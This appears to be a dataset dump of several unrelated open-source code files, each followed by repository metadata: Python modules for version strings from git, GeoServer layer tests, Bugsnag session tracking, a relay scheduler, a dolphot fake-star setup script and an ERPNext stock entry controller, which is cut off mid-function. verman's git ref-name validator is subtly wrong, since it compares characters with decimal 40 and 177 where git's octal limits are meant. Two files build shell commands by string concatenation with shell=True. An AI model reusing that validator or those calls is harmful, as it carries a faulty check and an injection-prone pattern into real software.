deleted_at = Column(DateTime, nullable=True, default=None)
def soft_delete(self, session):
"""Mark this object as deleted."""
self.deleted = self.id.replace('-', '')
self.deleted_at = timeutils.utcnow()
if hasattr(self, 'status'):
self.status = "DELETED"
self.save(session=session)
|
apache-2.0
| -4,693,961,072,000,867,000
| 32
| 79
| 0.694312
| false
| 4.036481
| false
| false
| false
|
biocore/verman
|
verman/__init__.py
|
1
|
9290
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Copyright (c) 2013, The BiPy Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
__credits__ = ["Daniel McDonald", "Jai Ram Rideout", "Yoshiki Vazquez Baeza"]
import os
import subprocess
class Version(object):
"""Represent module version information
This is inspired by Python's sys.version_info
"""
def __init__(self, package, major, minor, micro=None, releaselevel=None, init_file=None):
if not isinstance(package, str):
raise TypeError("Package must be a string")
if not isinstance(major, int):
raise TypeError("Major version must be an integer")
if not isinstance(minor, int):
raise TypeError("Minor version must be an integer")
if micro is not None and not isinstance(micro, int):
raise TypeError("Micro version must be an integer")
if releaselevel is not None and not isinstance(releaselevel, str):
raise TypeError("Releaselevel must be a string")
if init_file is not None and not os.path.exists(init_file):
raise ValueError("init_file must exist if provided")
self.package = package
self.major = major
self.minor = minor
self.micro = micro
self.releaselevel = releaselevel
self.init_file = init_file
@property
def mmm(self):
"""major.minor.micro version string"""
if self.micro is None:
return "%d.%d" % (self.major, self.minor)
else:
return "%d.%d.%d" % (self.major, self.minor, self.micro)
def __str__(self):
"""Return a version string"""
if self.micro is None:
base = "%d.%d" % (self.major, self.minor)
else:
base = "%d.%d.%d" % (self.major, self.minor, self.micro)
if self.releaselevel is not None:
base = "%s-%s" % (base, self.releaselevel)
git_branch = self.git_branch()
git_sha1 = self.git_sha1()
if git_branch is not None:
return "%s, %s@%s" % (base, git_branch, git_sha1)
else:
return base
def __repr__(self):
"""Return version information similar to Python's sys.version_info"""
name = "%s_version" % self.package
major = "major=%d" % self.major
minor = "minor=%d" % self.minor
items = [major, minor]
if self.micro is not None:
items.append("micro=%s" % self.micro)
if self.releaselevel is not None:
items.append("releaselevel='%s'" % self.releaselevel)
git_branch = self.git_branch()
git_sha1 = self.git_sha1(truncate=False)
if git_branch is not None:
git_branch = "git_branch='%s'" % git_branch
git_sha1 = "git_sha1='%s'" % git_sha1
items.append(git_branch)
items.append(git_sha1)
return "%s(%s)" % (name, ', '.join(items))
def git_branch(self):
"""Get the current branch (if applicable)
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if self.init_file is None:
return None
pkg_dir = self.package_dir()
branch_cmd = 'git --git-dir %s/.git rev-parse --abbrev-ref HEAD' %\
(pkg_dir)
branch_o, branch_e, branch_r = self.verman_system_call(branch_cmd)
git_branch = branch_o.strip()
if self._is_valid_git_refname(git_branch):
return git_branch
else:
return None
def git_sha1(self, truncate=True):
"""Get the current git SHA1 (if applicable)
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if self.init_file is None:
return None
pkg_dir = self.package_dir()
sha_cmd = 'git --git-dir %s/.git rev-parse HEAD' % (pkg_dir)
sha_o, sha_e, sha_r = self.verman_system_call(sha_cmd)
git_sha = sha_o.strip()
if self._is_valid_git_sha1(git_sha):
if truncate:
return git_sha[0:7]
else:
return git_sha
else:
return None
def _is_valid_git_refname(self, refname):
"""check if a string is a valid branch-name/ref-name for git
Input:
refname: string to validate
Output:
True if 'refname' is a valid branch name in git. False if it fails to
meet any of the criteria described in the man page for
'git check-ref-format', also see:
http://www.kernel.org/pub/software/scm/git/docs/git-check-ref-format.html
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if len(refname) == 0:
return False
# git imposes a few requirements to accept a string as a
# refname/branch-name
# They can include slash / for hierarchical (directory) grouping, but no
# slash-separated component can begin with a dot . or end with the
# sequence .lock
if (len([True for element in refname.split('/')
if element.startswith('.') or element.endswith('.lock')]) != 0):
return False
# They cannot have two consecutive dots .. anywhere
if '..' in refname:
return False
# They cannot have ASCII control characters (i.e. bytes whose values are
# lower than \040, or \177 DEL), space, tilde, caret ^, or colon :
# anywhere
if len([True for refname_char in refname if ord(refname_char) < 40 or
ord(refname_char) == 177]) != 0:
return False
if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:
return False
# They cannot have question-mark ?, asterisk *, or open bracket [
# anywhere
if '?' in refname or '*' in refname or '[' in refname:
return False
# They cannot begin or end with a slash / or contain multiple
# consecutive slashes
if refname.startswith('/') or refname.endswith('/') or '//' in refname:
return False
# They cannot end with a dot ..
if refname.endswith('.'):
return False
# They cannot contain a sequence @{
if '@{' in refname:
return False
# They cannot contain a \
if '\\' in refname:
return False
return True
def _is_valid_git_sha1(self, possible_hash):
"""check if a string is a valid git sha1 string
Input:
possible_hash: string to validate
Output:
True if the string has 40 characters and is an hexadecimal number, False
otherwise.
This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has
given explicit permission for this code to be licensed under BSD. The
discussion can be found here https://github.com/wasade/verman/issues/1
"""
if len(possible_hash) != 40:
return False
try:
_ = int(possible_hash, 16)
except ValueError:
return False
return True
def package_dir(self):
"""Returns the top-level package directory
This code was adapted from QIIME. The author, Greg Caporaso, has given
explicit permission for this code to be licensed under BSD. The
discussion can be found here: https://github.com/wasade/verman/issues/1
"""
# Get the full path of the module containing an instance of Version
if self.init_file is None:
return None
current_file_path = os.path.abspath(self.init_file)
# Get the directory
current_dir_path = os.path.dirname(current_file_path)
# Return the directory containing the directory containing the instance
return os.path.dirname(current_dir_path)
def verman_system_call(self, cmd):
"""Issue a system call
This code is based off of pyqi's pyqi_system_call
"""
proc = subprocess.Popen(cmd, shell=True, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# communicate pulls all stdout/stderr from the PIPEs to
# avoid blocking -- don't remove this line!
stdout, stderr = proc.communicate()
return_value = proc.returncode
return stdout, stderr, return_value
verman_version = Version("verman", 1, 1, 1, init_file=__file__)
__version__ = verman_version.mmm
|
bsd-3-clause
| -6,532,921,692,975,337,000
| 33.535316
| 93
| 0.583423
| false
| 4.117908
| false
| false
| false
|
CCSS-CZ/layman
|
server/tests/layedtest.py
|
1
|
3969
|
import os,sys
import unittest
import ConfigParser
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
INSTALL_DIR = os.path.abspath(os.path.join(TEST_DIR,".."))
sys.path.append(os.path.join(INSTALL_DIR))
import json
from layman.layed import LayEd
from layman.layed import GsRest
class LayEdTestCase(unittest.TestCase):
"""Test of the auth module"""
le = None # LayEd
workdir = None
cfg = None
def setUp(self):
cfg = ConfigParser.SafeConfigParser()
cfg.read((os.path.join(TEST_DIR,"tests.cfg")))
cfg.set("FileMan","testdir",TEST_DIR)
self.le = LayEd(cfg)
self.gsr = GsRest(cfg)
self.config = cfg
self.workdir = os.path.abspath(os.path.join(TEST_DIR,"workdir","data"))
# TODO: add tests for POST /layed?myLayer
def test_01_publish(self):
# ff = "world_cities_point.shp" # file
# ll = "world_cities_point" # layer
# st = "world_cities_point" # style
# ff = "pest.shp" # file
# ll = "pest" # layer
# st = "pest" # style
ff = "line_crs.shp" # file
ll = "line_crs" # layer
st = "line_crs" # style
ws = "mis" # workspace
ds = "testschema" # datastore
sch = "testschema" # schema
# Check #
# Check if the layer is not already there
(head, cont) = self.gsr.getLayer(ws, ll)
self.assertNotEquals("200", head["status"], "The layer already exists. Please, remove it manually." )
# Check if the style is not already there
(head, cont) = self.gsr.getStyle(ws, st)
self.assertNotEquals("200", head["status"], "The style already exists. Please, remove it manually." )
# Publish #
self.le.publish(fsUserDir=self.workdir, fsGroupDir="", dbSchema=ds, gsWorkspace=ws, fileName=ff)
# Test #
# Check if the layer is there
(head, cont) = self.gsr.getLayer(ws, ll)
self.assertEquals("200", head["status"], "The layer is not there. Was it created under another name?")
# Check the style of the layer
layerJson = json.loads(cont)
styleName = layerJson["layer"]["defaultStyle"]["name"]
self.assertEquals(st, styleName, "The layer is there, but it has wrong style assinged.")
# Check if the style is there
(head, cont) = self.gsr.getStyle(ws, st)
self.assertEquals("200", head["status"], "The style is not there." )
#def test_02_delete(self):
# Checks #
# Check that the layer is there
#(head, cont) = self.gsr.getLayer("dragouni", "line_crs")
#self.assertEquals("200", head["status"], "The layer line_crs is not there. Was it created under another name?")
# Check that the style is there
#(head, cont) = self.gsr.getStyle("dragouni", "line_crs")
#self.assertEquals("200", head["status"], "The style line_crs is not there." )
# Delete #
# Delete layer (including feature type, style and datastore)
#self.le.deleteLayer(workspace="dragouni", layer="line_crs", deleteStore=True)
# Test #
# Check that the layer is not there
#(head, cont) = self.gsr.getLayer("dragouni", "line_crs")
#self.assertNotEquals("200", head["status"], "The layer line_crs still exists, should be already deleted." )
# Check that the style is not there
#(head, cont) = self.gsr.getStyle("dragouni", "line_crs")
#self.assertNotEquals("200", head["status"], "The style line_crs already exists, should be already deleted." )
# Check that the data store is not there
#(head, cont) = self.gsr.getDataStore("dragouni", "line_crs")
#self.assertNotEquals("200", head["status"], "The data store line_crs already exists, should be already deleted." )
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(LayEdTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
|
gpl-3.0
| -507,578,213,640,657,300
| 35.75
| 123
| 0.615772
| false
| 3.595109
| true
| false
| false
|
bugsnag/bugsnag-python
|
bugsnag/sessiontracker.py
|
1
|
4934
|
from copy import deepcopy
from uuid import uuid4
from time import strftime, gmtime
from threading import Lock, Timer
from typing import List, Dict, Callable
import atexit
try:
from contextvars import ContextVar
_session_info = ContextVar('bugsnag-session', default={}) # type: ignore
except ImportError:
from bugsnag.utils import ThreadContextVar
# flake8: noqa
_session_info = ThreadContextVar('bugsnag-session', default={}) # type: ignore
from bugsnag.utils import package_version, FilterDict, SanitizingJSONEncoder
from bugsnag.event import Event
__all__ = [] # type: List[str]
class SessionTracker:
MAXIMUM_SESSION_COUNT = 100
SESSION_PAYLOAD_VERSION = "1.0"
"""
Session tracking class for Bugsnag
"""
def __init__(self, configuration):
self.session_counts = {} # type: Dict[str, int]
self.config = configuration
self.mutex = Lock()
self.auto_sessions = False
self.delivery_thread = None
def start_session(self):
if not self.auto_sessions and self.config.auto_capture_sessions:
self.auto_sessions = True
self.__start_delivery()
start_time = strftime('%Y-%m-%dT%H:%M:00', gmtime())
new_session = {
'id': uuid4().hex,
'startedAt': start_time,
'events': {
'handled': 0,
'unhandled': 0
}
}
_session_info.set(new_session)
self.__queue_session(start_time)
def send_sessions(self):
self.mutex.acquire()
try:
sessions = []
for min_time, count in self.session_counts.items():
sessions.append({
'startedAt': min_time,
'sessionsStarted': count
})
self.session_counts = {}
finally:
self.mutex.release()
self.__deliver(sessions)
def __start_delivery(self):
if self.delivery_thread is None:
def deliver():
self.send_sessions()
self.delivery_thread = Timer(30.0, deliver)
self.delivery_thread.daemon = True
self.delivery_thread.start()
self.delivery_thread = Timer(30.0, deliver)
self.delivery_thread.daemon = True
self.delivery_thread.start()
def cleanup():
if self.delivery_thread is not None:
self.delivery_thread.cancel()
self.send_sessions()
atexit.register(cleanup)
def __queue_session(self, start_time: str):
self.mutex.acquire()
try:
if start_time not in self.session_counts:
self.session_counts[start_time] = 0
self.session_counts[start_time] += 1
finally:
self.mutex.release()
def __deliver(self, sessions: List[Dict]):
if not sessions:
self.config.logger.debug("No sessions to deliver")
return
if not self.config.api_key:
self.config.logger.debug(
"Not delivering due to an invalid api_key"
)
return
if not self.config.should_notify():
self.config.logger.debug("Not delivering due to release_stages")
return
notifier_version = package_version('bugsnag') or 'unknown'
payload = {
'notifier': {
'name': Event.NOTIFIER_NAME,
'url': Event.NOTIFIER_URL,
'version': notifier_version
},
'device': FilterDict({
'hostname': self.config.hostname,
'runtimeVersions': self.config.runtime_versions
}),
'app': {
'releaseStage': self.config.release_stage,
'version': self.config.app_version
},
'sessionCounts': sessions
}
try:
encoder = SanitizingJSONEncoder(
self.config.logger,
separators=(',', ':'),
keyword_filters=self.config.params_filters
)
encoded_payload = encoder.encode(payload)
self.config.delivery.deliver_sessions(self.config, encoded_payload)
except Exception as e:
self.config.logger.exception('Sending sessions failed %s', e)
class SessionMiddleware:
"""
Session middleware ensures that a session is appended to the event.
"""
def __init__(self, bugsnag: Callable[[Event], Callable]):
self.bugsnag = bugsnag
def __call__(self, event: Event):
session = _session_info.get()
if session:
if event.unhandled:
session['events']['unhandled'] += 1
else:
session['events']['handled'] += 1
event.session = deepcopy(session)
self.bugsnag(event)
|
mit
| 8,336,604,068,259,510,000
| 30.031447
| 83
| 0.551074
| false
| 4.397504
| true
| false
| false
|
BirchJD/RPiTimer
|
PiTimer_Step-4/Schedule.py
|
1
|
5941
|
# PiTimer - Python Hardware Programming Education Project For Raspberry Pi
# Copyright (C) 2015 Jason Birch
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#/****************************************************************************/
#/* PiTimer - Step 4 - Schedule functions. */
#/* ------------------------------------------------------------------------ */
#/* V1.00 - 2015-07-04 - Jason Birch */
#/* ------------------------------------------------------------------------ */
#/* Class to handle scheduling events for specific relays. Such as adding, */
#/* removing, displaying, sorting. */
#/****************************************************************************/
import datetime
import ScheduleItem
#/****************************************************************************/
#/* Function to return the schedule date of a schedule item for when sorting */
#/* the items using the Python list sort feature. */
#/****************************************************************************/
def SortGetKey(Object):
return Object.GetScheduleDate()
class Schedule:
def __init__(self):
# Define an array to store the schedule items in.
self.ScheduleItems = []
#/*********************************************/
#/* Get the item at the specific array index. */
#/*********************************************/
def GetItem(self, ItemIndex):
if len(self.ScheduleItems) > ItemIndex:
return self.ScheduleItems[ItemIndex]
else:
return False
#/**************************************************/
#/* Find the schedule item with the specificed ID. */
#/**************************************************/
def FindItem(self, FindItemID):
ThisItem = False
for ThisScheduleItem in self.ScheduleItems:
if ThisScheduleItem.GetItemID() == FindItemID:
ThisItem = ThisScheduleItem
return ThisItem
#/*******************************************************/
#/* Function to display the current schedule of events. */
#/* In a tabulated form. */
#/*******************************************************/
def DisplaySchedule(self, SelectedItemID):
if len(self.ScheduleItems):
self.ScheduleItems[0].DisplayHeader()
for ThisScheduleItem in self.ScheduleItems:
if SelectedItemID == ThisScheduleItem.GetItemID():
SelectLeftChar = ">"
SelectRightChar = "<"
else:
SelectLeftChar = " "
SelectRightChar = " "
ThisScheduleItem.DisplayItem(SelectLeftChar, SelectRightChar)
if len(self.ScheduleItems):
self.ScheduleItems[0].DisplayFooter()
#/*************************************************/
#/* Add a new schedule item to the schedle array. */
#/*************************************************/
def AddSchedule(self, NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat):
self.ScheduleItems.append(ScheduleItem.ScheduleItem(NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat))
self.SortSchedule()
#/**************************************************/
#/* Delete a schedule item from the schedle array. */
#/**************************************************/
def DelSchedule(self, ItemID):
ThisScheduleItem = self.FindItem(ItemID)
if ThisScheduleItem:
self.ScheduleItems.remove(ThisScheduleItem)
self.SortSchedule()
#/*********************************************/
#/* Sort the list of schedule items so the */
#/* expired items are at the top of the list. */
#/*********************************************/
def SortSchedule(self):
self.ScheduleItems.sort(key=SortGetKey)
#/*************************************************************************/
#/* If the top schedule item is in the past return it's ID as being */
#/* triggered. The schedule items are kept in date order, so the top item */
#/* is the one which will trigger first. The calling function is */
#/* responsible for removing the triggered item from the scheduled items */
#/* or updating the scheduled item if the item is to be repeated once */
#/* the calling function has processed it; by calling the function: */
#/* SetNextScheduleDate(). */
#/*************************************************************************/
def ScheduleTrigger(self):
ThisItemID = False
Now = datetime.datetime.now()
ThisItem = self.GetItem(0)
if ThisItem and ThisItem.GetScheduleDate() <= Now:
ThisItemID = ThisItem.GetItemID()
return ThisItemID
#/*********************************************************************/
#/* Set the date and time of the specified schedule item to it's next */
#/* trigger date/time. If the item does not have a repeat period, */
#/* remove the schedule item. */
#/*********************************************************************/
def SetNextScheduleDate(self, ThisItemID):
ThisItem = self.FindItem(ThisItemID)
if ThisItem and ThisItem.SetNextScheduleDate() == False:
self.DelSchedule(ThisItemID)
self.SortSchedule()
|
gpl-3.0
| -9,058,749,069,529,155,000
| 40.838028
| 117
| 0.497391
| false
| 4.837948
| false
| false
| false
|
dweisz/pydolphot
|
make_fakerun.py
|
1
|
2967
|
import numpy as np
import sys
import subprocess
import os
'''
def makephotfiles(base, nstart, nruns, nimages):
for i in range(nstart,nstart+nruns):
for j in range(1, nimages+1):
subprocess.call("ln -s "+base+"."+np.str(j)+".res.fits " + base+"_"+np.str(i)+"."+np.str(j)+".res.fits", shell=True)
subprocess.call("ln -s "+base+"."+np.str(j)+".psf.fits " + base+"_"+np.str(i)+"."+np.str(j)+".psf.fits", shell=True)
subprocess.call("ln -s "+base+".info " + base+"_"+np.str(i)+".info", shell=True)
subprocess.call("ln -s "+base+".apcor " + base+"_"+np.str(i)+".apcor", shell=True)
subprocess.call("ln -s "+base+".psfs " + base+"_"+np.str(i)+".psfs", shell=True)
subprocess.call("ln -s "+base+".columns " + base+"_"+np.str(i)+".columns", shell=True)
subprocess.call("ln -s "+base + " " + base+"_"+np.str(i), shell=True)
'''
def makefakelist(photfile, filter1, filter2, fmin, fmax, cmin, cmax, nruns, nstars=15000, nstart=1):
for i in range(nstart, nstart+nruns):
subprocess.call('fakelist '+ np.str(photfile) + ' ' + np.str(filter1) + ' ' + np.str(filter2) + ' ' + np.str(fmin) + ' ' + np.str(fmax) + ' ' + np.str(cmin) + ' ' + np.str(cmax) + ' ' + "-nstar=" + np.str(nstars) + "> fake.list_" + np.str(i), shell=True)
subprocess.call('sleep 5', shell=True )
def makefakeparam(param_file, base, nruns, nstart=1):
infile = param_file
for i in range(nstart, nstart+nruns):
fakeparam = "phot.fake_"+np.str(i)+".param"
subprocess.call("cp "+infile+" "+fakeparam, shell=True)
outfile = fakeparam
f1 = open(fakeparam, 'a')
f1.write("ACSuseCTE = 1\n")
f1.write("WFC3useCTE = 1\n")
f1.write("RandomFake = 1\n")
f1.write("FakeMatch=3.0\n")
f1.write("FakePad=0\n")
f1.write("FakeStarPSF = 1.5\n")
f1.write("FakeOut="+base+"_fake_"+np.str(i)+".fake\n")
f1.write("FakeStars=fake.list_"+np.str(i)+"\n")
f1.close()
def makerunfake(param_file, base, nruns, nstart=1):
for i in range(nstart, nstart+nruns):
fakeparam = "phot.fake_"+np.str(i)+".param"
outfile = "runfake"+np.str(i)
f = open(outfile, 'w')
f.write("cd " + os.getcwd()+"\n")
f.write("dolphot " + base+ " -p" + fakeparam + " >> fake.log_"+np.str(i))
f.close()
subprocess.call("chmod +x " + outfile, shell=True)
'''
cd /clusterfs/dweisz/photometry/leop/
dolphot leop_acs.phot_1 -pleop.fake.param_1 >> fake1.log
'''
#if __name__ == '__main__':
base = sys.argv[1] # e.g., test.phot
#rundir = sys.argv[2]
#nimages = np.int(sys.argv[3])
#name = sys.argv[3]
param_file = sys.argv[2] # name of photometry parameter file
nruns = np.int(sys.argv[3])
filters = sys.argv[4]
f1min = np.float(sys.argv[5])
f1max = np.float(sys.argv[6])
c1min = np.float(sys.argv[7])
c1max = np.float(sys.argv[8])
#nimages = 12
#nruns = 72
#makephotfiles(base, 1, nruns , nimages)
makefakeparam(param_file, base, nruns)
makerunfake(param_file, base, nruns)
makefakelist(base, filters.split()[0], filters.split()[1], f1min, f1max, c1min, c1max, nruns)
#main()
|
mit
| 4,988,895,559,438,587,000
| 31.25
| 256
| 0.624874
| false
| 2.345455
| false
| false
| false
|
collab-project/luma.cryptocurrency
|
luma/cryptocurrency/endpoint/coinmarketcap.py
|
1
|
1134
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Thijs Triemstra and contributors
# See LICENSE.rst for details.
"""
Endpoint for coinmarketcap.com
:see: https://coinmarketcap.com/api/
"""
from datetime import datetime
from dateutil.tz.tz import tzutc
from . import Endpoint, EndpointResponse
class CoinmarketcapResponse(EndpointResponse):
@property
def data(self):
return self.json_data[0]
def parse_price(self):
return float(self.data.get('price_{}'.format(
self.currency_code.lower())))
def parse_price_in_btc(self):
return float(self.data.get('price_btc'))
def parse_timestamp(self):
return datetime.fromtimestamp(
int(self.data.get('last_updated')), tz=tzutc())
class Coinmarketcap(Endpoint):
responseType = CoinmarketcapResponse
def get_url(self):
base = 'https://api.coinmarketcap.com/{api_version}/ticker/{coin}/'
if self.currency_code != 'USD':
base += '?convert={}'.format(self.currency_code)
return base.format(
api_version=self.api_version,
coin=self.coin
)
|
mit
| 1,155,416,785,745,923,300
| 22.625
| 75
| 0.640212
| false
| 3.623003
| false
| false
| false
|
rohitwaghchaure/New_Theme_Erp
|
erpnext/stock/doctype/stock_entry/stock_entry.py
|
1
|
34617
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
from frappe.utils import cstr, cint, flt, comma_or, nowdate
from frappe import _
from erpnext.stock.utils import get_incoming_rate
from erpnext.stock.stock_ledger import get_previous_sle
from erpnext.controllers.queries import get_match_cond
from erpnext.stock.get_item_details import get_available_qty
class NotUpdateStockError(frappe.ValidationError): pass
class StockOverReturnError(frappe.ValidationError): pass
class IncorrectValuationRateError(frappe.ValidationError): pass
class DuplicateEntryForProductionOrderError(frappe.ValidationError): pass
from erpnext.controllers.stock_controller import StockController
form_grid_templates = {
"mtn_details": "templates/form_grid/stock_entry_grid.html"
}
class StockEntry(StockController):
fname = 'mtn_details'
def onload(self):
if self.docstatus==1:
for item in self.get(self.fname):
item.update(get_available_qty(item.item_code,
item.s_warehouse))
def validate(self):
self.validate_posting_time()
self.validate_purpose()
pro_obj = self.production_order and \
frappe.get_doc('Production Order', self.production_order) or None
self.set_transfer_qty()
self.validate_item()
self.validate_uom_is_integer("uom", "qty")
self.validate_uom_is_integer("stock_uom", "transfer_qty")
self.validate_warehouse(pro_obj)
self.validate_production_order(pro_obj)
self.get_stock_and_rate()
self.validate_incoming_rate()
self.validate_bom()
self.validate_finished_goods()
self.validate_return_reference_doc()
self.validate_with_material_request()
self.validate_fiscal_year()
self.validate_valuation_rate()
self.set_total_amount()
def on_submit(self):
from erpnext.stock.stock_custom_methods import validate_for_si_submitted
validate_for_si_submitted(self)
self.update_stock_ledger()
from erpnext.stock.doctype.serial_no.serial_no import update_serial_nos_after_submit
update_serial_nos_after_submit(self, "mtn_details")
self.update_production_order()
self.make_gl_entries()
def on_cancel(self):
self.update_stock_ledger()
self.update_production_order()
self.make_gl_entries_on_cancel()
def validate_fiscal_year(self):
from erpnext.accounts.utils import validate_fiscal_year
validate_fiscal_year(self.posting_date, self.fiscal_year,
self.meta.get_label("posting_date"))
def validate_purpose(self):
valid_purposes = ["Material Issue", "Material Receipt", "Material Transfer",
"Manufacture/Repack", "Subcontract", "Sales Return", "Purchase Return"]
if self.purpose not in valid_purposes:
frappe.throw(_("Purpose must be one of {0}").format(comma_or(valid_purposes)))
def set_transfer_qty(self):
for item in self.get("mtn_details"):
if not flt(item.qty):
frappe.throw(_("Row {0}: Qty is mandatory").format(item.idx))
item.transfer_qty = flt(item.qty * item.conversion_factor, self.precision("transfer_qty", item))
def validate_item(self):
stock_items = self.get_stock_items()
serialized_items = self.get_serialized_items()
for item in self.get("mtn_details"):
if item.item_code not in stock_items:
frappe.throw(_("{0} is not a stock Item").format(item.item_code))
if not item.stock_uom:
item.stock_uom = frappe.db.get_value("Item", item.item_code, "stock_uom")
if not item.uom:
item.uom = item.stock_uom
if not item.conversion_factor:
item.conversion_factor = 1
if not item.transfer_qty:
item.transfer_qty = item.qty * item.conversion_factor
if (self.purpose in ("Material Transfer", "Sales Return", "Purchase Return")
and not item.serial_no
and item.item_code in serialized_items):
frappe.throw(_("Row #{0}: Please specify Serial No for Item {1}").format(item.idx, item.item_code),
frappe.MandatoryError)
def validate_warehouse(self, pro_obj):
"""perform various (sometimes conditional) validations on warehouse"""
source_mandatory = ["Material Issue", "Material Transfer", "Purchase Return"]
target_mandatory = ["Material Receipt", "Material Transfer", "Sales Return"]
validate_for_manufacture_repack = any([d.bom_no for d in self.get("mtn_details")])
if self.purpose in source_mandatory and self.purpose not in target_mandatory:
self.to_warehouse = None
for d in self.get('mtn_details'):
d.t_warehouse = None
elif self.purpose in target_mandatory and self.purpose not in source_mandatory:
self.from_warehouse = None
for d in self.get('mtn_details'):
d.s_warehouse = None
for d in self.get('mtn_details'):
if not d.s_warehouse and not d.t_warehouse:
d.s_warehouse = self.from_warehouse
d.t_warehouse = self.to_warehouse
if not (d.s_warehouse or d.t_warehouse):
frappe.throw(_("Atleast one warehouse is mandatory"))
if self.purpose in source_mandatory and not d.s_warehouse:
frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx))
if self.purpose in target_mandatory and not d.t_warehouse:
frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx))
if self.purpose == "Manufacture/Repack":
if validate_for_manufacture_repack:
if d.bom_no:
d.s_warehouse = None
if not d.t_warehouse:
frappe.throw(_("Target warehouse is mandatory for row {0}").format(d.idx))
elif pro_obj and cstr(d.t_warehouse) != pro_obj.fg_warehouse:
frappe.throw(_("Target warehouse in row {0} must be same as Production Order").format(d.idx))
else:
d.t_warehouse = None
if not d.s_warehouse:
frappe.throw(_("Source warehouse is mandatory for row {0}").format(d.idx))
if cstr(d.s_warehouse) == cstr(d.t_warehouse):
frappe.throw(_("Source and target warehouse cannot be same for row {0}").format(d.idx))
def validate_production_order(self, pro_obj=None):
if not pro_obj:
if self.production_order:
pro_obj = frappe.get_doc('Production Order', self.production_order)
else:
return
if self.purpose == "Manufacture/Repack":
# check for double entry
self.check_duplicate_entry_for_production_order()
elif self.purpose != "Material Transfer":
self.production_order = None
def check_duplicate_entry_for_production_order(self):
other_ste = [t[0] for t in frappe.db.get_values("Stock Entry", {
"production_order": self.production_order,
"purpose": self.purpose,
"docstatus": ["!=", 2],
"name": ["!=", self.name]
}, "name")]
if other_ste:
production_item, qty = frappe.db.get_value("Production Order",
self.production_order, ["production_item", "qty"])
args = other_ste + [production_item]
fg_qty_already_entered = frappe.db.sql("""select sum(transfer_qty)
from `tabStock Entry Detail`
where parent in (%s)
and item_code = %s
and ifnull(s_warehouse,'')='' """ % (", ".join(["%s" * len(other_ste)]), "%s"), args)[0][0]
if fg_qty_already_entered >= qty:
frappe.throw(_("Stock Entries already created for Production Order ")
+ self.production_order + ":" + ", ".join(other_ste), DuplicateEntryForProductionOrderError)
def validate_valuation_rate(self):
if self.purpose == "Manufacture/Repack":
valuation_at_source, valuation_at_target = 0, 0
for d in self.get("mtn_details"):
if d.s_warehouse and not d.t_warehouse:
valuation_at_source += flt(d.amount)
if d.t_warehouse and not d.s_warehouse:
valuation_at_target += flt(d.amount)
if valuation_at_target < valuation_at_source:
frappe.throw(_("Total valuation for manufactured or repacked item(s) can not be less than total valuation of raw materials"))
def set_total_amount(self):
self.total_amount = sum([flt(item.amount) for item in self.get("mtn_details")])
def get_stock_and_rate(self, force=False):
"""get stock and incoming rate on posting date"""
raw_material_cost = 0.0
if not self.posting_date or not self.posting_time:
frappe.throw(_("Posting date and posting time is mandatory"))
allow_negative_stock = cint(frappe.db.get_default("allow_negative_stock"))
for d in self.get('mtn_details'):
args = frappe._dict({
"item_code": d.item_code,
"warehouse": d.s_warehouse or d.t_warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time,
"qty": d.s_warehouse and -1*d.transfer_qty or d.transfer_qty,
"serial_no": d.serial_no
})
# get actual stock at source warehouse
d.actual_qty = get_previous_sle(args).get("qty_after_transaction") or 0
# validate qty during submit
if d.docstatus==1 and d.s_warehouse and not allow_negative_stock and d.actual_qty < d.transfer_qty:
frappe.throw(_("""Row {0}: Qty not avalable in warehouse {1} on {2} {3}.
Available Qty: {4}, Transfer Qty: {5}""").format(d.idx, d.s_warehouse,
self.posting_date, self.posting_time, d.actual_qty, d.transfer_qty))
# get incoming rate
if not d.bom_no:
if not flt(d.incoming_rate) or d.s_warehouse or self.purpose == "Sales Return" or force:
incoming_rate = flt(self.get_incoming_rate(args), self.precision("incoming_rate", d))
if incoming_rate > 0:
d.incoming_rate = incoming_rate
d.amount = flt(d.transfer_qty) * flt(d.incoming_rate)
if not d.t_warehouse:
raw_material_cost += flt(d.amount)
# set incoming rate for fg item
if self.purpose == "Manufacture/Repack":
number_of_fg_items = len([t.t_warehouse for t in self.get("mtn_details") if t.t_warehouse])
for d in self.get("mtn_details"):
if d.bom_no or (d.t_warehouse and number_of_fg_items == 1):
if not flt(d.incoming_rate) or force:
operation_cost_per_unit = 0
if d.bom_no:
bom = frappe.db.get_value("BOM", d.bom_no, ["operating_cost", "quantity"], as_dict=1)
operation_cost_per_unit = flt(bom.operating_cost) / flt(bom.quantity)
d.incoming_rate = operation_cost_per_unit + (raw_material_cost / flt(d.transfer_qty))
d.amount = flt(d.transfer_qty) * flt(d.incoming_rate)
break
def get_incoming_rate(self, args):
incoming_rate = 0
if self.purpose == "Sales Return":
